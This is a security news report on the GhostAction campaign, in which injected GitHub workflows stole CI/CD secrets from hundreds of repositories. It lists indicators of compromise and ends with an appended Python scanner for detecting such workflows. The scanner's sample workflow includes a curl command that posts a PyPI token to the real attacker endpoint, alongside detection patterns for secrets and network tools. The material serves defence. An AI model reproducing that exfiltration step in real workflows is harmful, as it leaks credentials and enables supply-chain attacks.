Divya
2025-09-08 01:28:00
gbhackers.com
Security researchers uncovered a large-scale attack campaign now identified as GhostAction, which compromised secrets belonging to 327 GitHub users and impacted 817 repositories.
The incident began with the discovery of a malicious workflow embedded in the widely used FastUUID project.
The attack was first spotted when GitGuardian detected a suspicious GitHub workflow commit titled “Add Github Actions Security workflow” pushed by the account Grommash9 on September 2, 2025.
This workflow was designed to steal sensitive secrets, such as API tokens, by transmitting them to an attacker-controlled server.
FastUUID as the Entry Point
The injected malicious file extracted the PyPI API token from the repository’s environment variables, then exfiltrated it to an external server.
While the token could have been used to tamper with the FastUUID package on PyPI, researchers confirmed no evidence of malicious releases during the compromise window.
GitGuardian immediately raised an alert issue and reported the matter to PyPI. Within hours, PyPI placed the project in read-only mode, and the compromised maintainer rolled back the malicious commit.
Because of this swift response, the impact on FastUUID and its dependent projects, like BerriAI/litellm, appears minimal.

However, further investigation revealed that FastUUID was not the sole target. Identical malicious commits were detected across multiple repositories, both public and private.
Researchers linked the attack to a broader campaign affecting hundreds of projects. Each commit deployed similar workflows that attempted to exfiltrate a variety of secrets, including GitHub tokens, DockerHub credentials, Cloudflare API tokens, and NPM access keys.
In total, GitGuardian identified 3,325 leaked secrets across the campaign. The compromised NPM and PyPI tokens pose a significant supply chain security risk, as they could allow attackers to publish malicious packages under trusted names.

The malicious workflows consistently sent stolen data to the server at hxxps://bold-dhawan.45-139-104-115.plesk.page, which resolved to an IP hosted under 493networking.cc.
This infrastructure stopped responding by the evening of September 5, suggesting the attacker may have shut it down after discovery.
Of the 817 repositories impacted, 100 reverted the changes quickly, while GitGuardian was able to warn maintainers in another 573 projects.
Some repositories, however, had already been deleted or had issues disabled, limiting the ability to notify owners.
Initial reports from affected developers confirm that the stolen secrets were actively exploited, including unauthorized use of AWS keys and database credentials.
Several companies had entire software portfolios compromised, spanning languages such as Python, Rust, JavaScript, and Go.
GitGuardian disclosed the full findings to GitHub, PyPI, and NPM on September 5. As of now, 9 NPM packages and 15 PyPI projects remain at potential risk if their compromised tokens are leveraged to publish malicious updates.
The GhostAction campaign stands as one of the largest developer ecosystem compromises in recent years, highlighting the importance of monitoring workflows, securing CI/CD secrets, and maintaining rapid incident response.
Indicators of Compromise (IOCs)
Network Indicators
- Malicious Endpoint: hxxps://bold-dhawan.45-139-104-115.plesk.page
- IP Address: 45.139.104.115
- HTTP Method: POST requests with secret data
GitHub Workflow Indicators
- Malicious Workflow Name: Github Actions Security
- File Path: .github/workflows/github_actions_security.yml
- Commit Messages: “Add Github Actions Security workflow”
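A defender-side check for the pattern described above, added here as an example and not part of GitGuardian's or the article's own tooling: it scans a workflow file for the reported workflow name and endpoint, and for any step that references a repository secret while calling out to a host outside an allowlist. The allowlist, the sample workflow and the function names are constructed assumptions; the two IOC values come from the article.

```python
import re
# Constructed allowlist for this example: hosts a secret-handling step may legitimately contact.
ALLOWED_HOSTS = {"api.github.com", "upload.pypi.org", "registry.npmjs.org"}
# Indicators taken from the GhostAction report above.
IOC_WORKFLOW_NAME = "Github Actions Security"
IOC_HOST = "bold-dhawan.45-139-104-115.plesk.page"
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.IGNORECASE)
NET_TOOLS = re.compile(r"\b(curl|wget|Invoke-WebRequest|requests\.post|urllib)\b")
def split_steps(workflow_text):
    """Dependency-free splitter: a new step begins at '- name:', '- uses:' or '- run:'."""
    steps = []
    for line in workflow_text.splitlines():
        if re.match(r"^\s*-\s+(name|uses|run):", line):
            steps.append([line])
        elif steps:
            steps[-1].append(line)
    return ["\n".join(s) for s in steps]
def scan_workflow(workflow_text):
    """Return (reason, location) pairs for content matching the GhostAction pattern."""
    findings = []
    name_re = rf"^name:\s*['\"]?{re.escape(IOC_WORKFLOW_NAME)}['\"]?\s*$"
    if re.search(name_re, workflow_text, re.MULTILINE):
        findings.append(("workflow name matches GhostAction IOC", "<workflow>"))
    for step in split_steps(workflow_text):
        head = step.strip().splitlines()[0]
        hosts = set(URL_HOST.findall(step))
        if IOC_HOST in hosts:
            findings.append(("contacts known GhostAction endpoint", head))
        # Secret reference plus a call to a non-allowlisted host is the exfiltration shape described above.
        if SECRET_REF.search(step) and NET_TOOLS.search(step):
            unknown = hosts - ALLOWED_HOSTS
            if unknown or not hosts:
                findings.append((f"secret used with network call to {sorted(unknown) or 'non-literal URL'}", head))
    return findings

# Constructed sample mimicking the shape of the reported commit (not the real file).
SAMPLE = """name: Github Actions Security
jobs:
  audit:
    steps:
      - name: Publish
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_API_TOKEN }}
        run: python -m twine upload --repository-url https://upload.pypi.org/legacy/ dist/*
      - name: Security check
        env:
          TOKEN: ${{ secrets.PYPI_API_TOKEN }}
        run: curl -s -X POST -d "t=$TOKEN" https://bold-dhawan.45-139-104-115.plesk.page/collect
"""
```

Running `scan_workflow(SAMPLE)` flags the workflow name, the known endpoint and the secret-plus-network step, while the legitimate twine upload to an allowlisted host produces no finding.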